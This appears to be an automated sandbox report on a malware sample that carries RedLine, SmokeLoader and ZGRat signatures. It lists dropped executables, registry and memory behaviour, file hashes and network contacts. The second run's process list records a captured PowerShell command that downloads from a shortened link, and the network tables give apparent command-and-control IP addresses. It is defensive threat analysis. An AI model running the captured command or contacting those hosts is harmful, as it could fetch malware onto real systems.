Analysis Overview
SHA256
2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda
Threat Level: Known bad
The file 0x00310000000142c9-42.dat was found to be: Known bad.
Malicious Activity Summary
ZGRat
RedLine
RedLine payload
Detect ZGRat V1
Smokeloader family
SmokeLoader
Downloads MZ/PE file
Executes dropped EXE
Deletes itself
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Unsigned PE
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 22:22
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 22:22
Reported
2023-12-18 22:24
Platform
win7-20231215-en
Max time kernel
28s
Max time network
89s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6D44.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8161.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1200 wrote to memory of 2676 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6D44.exe |
| PID 1200 wrote to memory of 2676 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6D44.exe |
| PID 1200 wrote to memory of 2676 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6D44.exe |
| PID 1200 wrote to memory of 2676 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6D44.exe |
| PID 1200 wrote to memory of 2828 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8161.exe |
| PID 1200 wrote to memory of 2828 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8161.exe |
| PID 1200 wrote to memory of 2828 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8161.exe |
| PID 1200 wrote to memory of 2828 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8161.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe
"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"
C:\Users\Admin\AppData\Local\Temp\6D44.exe
C:\Users\Admin\AppData\Local\Temp\6D44.exe
C:\Users\Admin\AppData\Local\Temp\8161.exe
C:\Users\Admin\AppData\Local\Temp\8161.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 64.185.227.156:80 | api.ipify.org | tcp |
Files
memory/1792-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1792-2-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1200-1-0x0000000002620000-0x0000000002636000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6D44.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2676-14-0x00000000000E0000-0x0000000000132000-memory.dmp
memory/2676-19-0x0000000074B70000-0x000000007525E000-memory.dmp
memory/2676-20-0x0000000005090000-0x00000000050D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8161.exe
| MD5 | 93fbe8d58f4b01f59ca937652e31eaf2 |
| SHA1 | 7a2174923e079927b7958c470936cac5a3531fb0 |
| SHA256 | 36dcb91a2e2d215b994d8c186bc9b700256f89dbeb8755174c7d9c9783a72375 |
| SHA512 | 2779d74c5b7421614b97c5ca5bf89480836b99480d4d4097412f7927f1eaac39ecf2a3ccf31d5466245af7940a329c6df95019c117ee917ba2a11378b38b19cf |
C:\Users\Admin\AppData\Local\Temp\8161.exe
| MD5 | 444e16aca6430bd81d9b2a8c5ec03d3a |
| SHA1 | 4bace67150714c7f6fb39964185662e9663c84c9 |
| SHA256 | 5da975f37bedf34090ed8c9af159b28f4d558528c230125f323ee8d330198d2c |
| SHA512 | f6593ff9cb2c03465e70aa6ca12fe44610e3f2fc7d2867129c9cbfb461d304930b5836eb700fe015673b0e6662ef821d1219caacafe1bec06e3dfc733b808581 |
memory/2828-28-0x0000000074B70000-0x000000007525E000-memory.dmp
memory/2828-29-0x0000000001390000-0x0000000002182000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 3df75168773632c0b0b22c30b563fa6b |
| SHA1 | f49f2893fd05ddac2665a62dfb9c539404888db9 |
| SHA256 | 5bf6ef91f77ca28072e79145fd8483c86ec17cd4af0debd2b10f940c65ed9046 |
| SHA512 | faced7e2e524001d0568dfab1e858ac209fb39a771cc08bd7a3000231a041bf0467f4ce9c114d451f865b4b892b30ff83b27cc1fc0148a0bcf8e74d47b84f521 |
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 42bfc03dfd92f38837a93cd1a7192b6b |
| SHA1 | a36cd5b921198419392305d49e084acc955eb1e0 |
| SHA256 | 466b5a3c0c047dcf7612403a928023b31854a70afa808af03c369f56e4c459b4 |
| SHA512 | d718f343222cb52f5b379803f4a16563a2c09ad1aa47e2a2e0576cef9750463e5479decb1f82aabf5d0dd521120f2c25336c011c423f042ae19240439e928d6a |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | c5721320a24fc417b6ab31aad35d0da8 |
| SHA1 | 4b458495005bff7ccbecbab9f7c8e5db79fe6ad6 |
| SHA256 | 34735b52225a58c4f1a19ed55cc22cc267b05210b266a0c30f73e399a2f7d95d |
| SHA512 | 61cdf3b744300c23dd4ad8999b905dba0a6bbbc0fa5d5dc5832edc776f7f38ef2456887c79744eed8556510bc53c2a4de4a269560dde517fd735a7c70b8a46f6 |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 069ac54873a7f27472c62e1b734446e8 |
| SHA1 | cc4ba2ac2ea326c4e5cdae2ac47c49635505a6d1 |
| SHA256 | 124db1665fb3498b6625a9a76cf82ebd68a9fdfd5ea09d14abb8c80cc1d74469 |
| SHA512 | 12a94740b795a1b23a83e0dd12c47d1ed97c7a0a6f2edb20594aec15a008d021981bf23be09d11f77b443bc13ae15d35fc7912b7f9af324dfbccda38e8f7c409 |
\Users\Admin\AppData\Local\Temp\nsy8289.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 9293f28345f77d324f8c5a350ecd2b63 |
| SHA1 | 7c7af60ce86f784c7dd257533c6002da05d06a08 |
| SHA256 | aec0b7efe1eefbfda2f68bda142e363c43c649b032554de1e9c6a41b6b357c88 |
| SHA512 | b194208dce9aae37153a7b13ea946e1a69250662debd162abd363282dcb3fc99a280b19d57d8ab278af54d399b52c3e6525ed299ce08c51a9c75cc323fe6fe87 |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 0f44ea4f7ad14d998b7995caac6c2a39 |
| SHA1 | c937d2e9c7105f2c26b164e6d98a307fc4147f50 |
| SHA256 | 717ac8c5dcdecebc3cb37198e925ee1bf767be39fef80dea42b4c569c5f0f96e |
| SHA512 | 0c5b91ab16276318b43dbb7406d71f69d7d41c1032e5f73fc4e46561c42c52bf8cf06c31acbc44dad425903a27b95e4dc0935eabcc23ee16342e61d00078e0ef |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 9aba4f6b81fe111b7cbf15e91f0da3d2 |
| SHA1 | dc2a1547a638e43c6a3359402ede56defd44907a |
| SHA256 | b9400948c1c53b4e882a7adab23b6841421da4245cf6875977367368b67043df |
| SHA512 | 9a99128bce8f29103d0d6d381d2739ae778bf0023c04188d0db32e8c9a8873bc8af15b67730c2b4ad2578c8c58767682bdf8cf6e43fa571e8147e084d40fcb0e |
memory/1628-62-0x00000000028B0000-0x0000000002CA8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 2415122607d4c35b75a99e934603fb0e |
| SHA1 | 8989b358c502064a1ac244862687684928c06413 |
| SHA256 | f544d8ba4ae2545f65c834a87dc48ee08528e613ccd7b68d7905deb90b682b2a |
| SHA512 | cffc9a761d142c77fba266643e0b918160c53ddcf891a7dc9958703f36b4c34a52dcc845f663d398dd3e08f4f41415e418d9fae1026de07866508791531a4cf9 |
memory/3004-83-0x0000000000400000-0x0000000000418000-memory.dmp
memory/1196-90-0x0000000000400000-0x0000000000409000-memory.dmp
memory/2712-89-0x00000000001D0000-0x00000000001D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 5f4a6709ed76a8e46881c084ba7e3f65 |
| SHA1 | fe435c6fda11c05e5fa32eaedf22b7aeb833a794 |
| SHA256 | 64bf7af1c4e33f0ca7dd8a2dac5743956e1903521a520e5d9d52658edd6461fd |
| SHA512 | 189d6c1dfc02d562b6de657146e8983fb7895f5a640142c70859d5c1bc33ac14be3ff8d41997851b86c3b0b86f76d228df0a1f20cf9157311953b0ad146a497f |
memory/1196-87-0x0000000000400000-0x0000000000409000-memory.dmp
\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | de3284b901a049a0ca33686ae77fd32c |
| SHA1 | 1e5dc486693f88920bf28b11ab3f2c5c23d73219 |
| SHA256 | 54629baee0d279a7173e2d8b9b2e94d6f6d705b2aca5c621a271236b12d33e6c |
| SHA512 | d01514aee820061d3bf4936b374b22815ff0163b454b1dd7d558c3b0845e47264cd4f8a7ca0e99096bf115a974182e5fb2df0bd84bc714608f16b71df6b1d81e |
memory/2808-85-0x0000000000220000-0x0000000000229000-memory.dmp
memory/1196-82-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1628-91-0x00000000028B0000-0x0000000002CA8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 6496de51be7184118203296edfa03c31 |
| SHA1 | cd5abb9a399c6e595c5bf5ce1674a34db9b8cb14 |
| SHA256 | af8cfa093cad3953ecc9b6e7d9c7a36bc9bd7f204745c2a0efb2a4c065dd579a |
| SHA512 | 7a21eceb52e4826ecf8fab7b4a7d8566752392de4a5ee7ab5f720b24a0015320761e62408d4525b786385c0e691701dc132cf8732e6cb5ff431aed9b5c3933fd |
memory/1628-92-0x0000000002CB0000-0x000000000359B000-memory.dmp
memory/2828-80-0x0000000074B70000-0x000000007525E000-memory.dmp
memory/2808-79-0x0000000000A00000-0x0000000000B00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
memory/1628-93-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 0860f85ceba2964798afaa67206d6a8c |
| SHA1 | e84c18900c0fc2fae4ea844603aa51f195aa4654 |
| SHA256 | ec48f9dcce8e579a87d95577f129a823be2b522ce4f400e6b967fab302f3d22e |
| SHA512 | bb12f2a10fa43a5159ed4d04ffb5e8a9299d6b7800ed4daf8ef8180a69c34553a8af4cd4f82d623793c8b267ce84f758dd1d020a1c1121943f9df14ee719dc49 |
\Users\Admin\AppData\Local\Temp\nsy8289.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 22:22
Reported
2023-12-18 22:24
Platform
win10v2004-20231215-en
Max time kernel
32s
Max time network
66s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A539.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3492 wrote to memory of 700 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A539.exe |
| PID 3492 wrote to memory of 700 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A539.exe |
| PID 3492 wrote to memory of 700 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A539.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe
"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"
C:\Users\Admin\AppData\Local\Temp\A539.exe
C:\Users\Admin\AppData\Local\Temp\A539.exe
C:\Users\Admin\AppData\Local\Temp\B15F.exe
C:\Users\Admin\AppData\Local\Temp\B15F.exe
C:\Users\Admin\AppData\Local\Temp\BDA5.exe
C:\Users\Admin\AppData\Local\Temp\BDA5.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\is-6NLTA.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6NLTA.tmp\tuc3.tmp" /SL5="$501FC,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\C288.exe
C:\Users\Admin\AppData\Local\Temp\C288.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Program Files (x86)\StdButton\stdbutton.exe
"C:\Program Files (x86)\StdButton\stdbutton.exe" -s
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.73.60:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.73.217.52.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 64.185.227.156:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 156.227.185.64.in-addr.arpa | udp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
| US | 93.184.216.34:443 | tcp | |
| US | 52.165.165.26:443 | tcp | |
| RU | 5.42.64.35:80 | tcp |
Files
memory/456-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3492-1-0x0000000002650000-0x0000000002666000-memory.dmp
memory/456-2-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\A539.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/700-12-0x0000000001430000-0x0000000001482000-memory.dmp
memory/700-17-0x0000000074410000-0x0000000074BC0000-memory.dmp
memory/700-18-0x00000000060D0000-0x0000000006674000-memory.dmp
memory/700-19-0x0000000005B20000-0x0000000005BB2000-memory.dmp
memory/700-20-0x0000000005DB0000-0x0000000005DC0000-memory.dmp
memory/700-21-0x0000000005BC0000-0x0000000005BCA000-memory.dmp
memory/700-23-0x0000000007130000-0x0000000007748000-memory.dmp
memory/700-24-0x00000000089B0000-0x0000000008ABA000-memory.dmp
memory/700-25-0x0000000007000000-0x0000000007012000-memory.dmp
memory/700-26-0x0000000007060000-0x000000000709C000-memory.dmp
memory/700-27-0x00000000070B0000-0x00000000070FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B15F.exe
| MD5 | e6eb3adc80afeb9fe6fcdcd0bcea7b8c |
| SHA1 | cca2f9898a1eb7bbbc7a7fc5c2bfa9205e0c49d4 |
| SHA256 | 3dae2ea5842c058cda1df0525924b1d29c2b1239074e4a9855d985c48a74cd8c |
| SHA512 | 44575b05ed551c9ef9962ae60b496ba85d25452ccf187cda15a13823b5dfa5ac87e559aa13efd276b0ce2dd9a77369a6c9ad53eb56d0700a86607169d862a9a9 |
C:\Users\Admin\AppData\Local\Temp\B15F.exe
| MD5 | ee9c445c99d7fa495e63fd30b8859038 |
| SHA1 | 79fcd4771be0b2e12a5859b161142f784bb9c8f1 |
| SHA256 | 43a4339cdc20c64ae43a1a98085b526e5aaf0437253b286ff036f24c2da9100b |
| SHA512 | b09de3b15ae3606d3e962135ad4c3e9902d0f1a62d30e5a3220f3fa48935b12b8c27d306a21c34b1be0ae05b15ce688f4b583d65c47c388bfef14f4e8ac6723a |
memory/2208-33-0x0000000000960000-0x0000000000DFE000-memory.dmp
memory/2208-34-0x0000000005920000-0x00000000059BC000-memory.dmp
memory/2208-35-0x00000000059F0000-0x0000000005A00000-memory.dmp
memory/2208-32-0x0000000074410000-0x0000000074BC0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BDA5.exe
| MD5 | 5d3f41a2bc742603daf1d51270f3c80b |
| SHA1 | 252bb1132b20c5db7df0b979ae80f8c4125768ea |
| SHA256 | 0f198f58a52c60028c1e8b5287208da608fa1ceb7f151386cd4a82c4704eb18c |
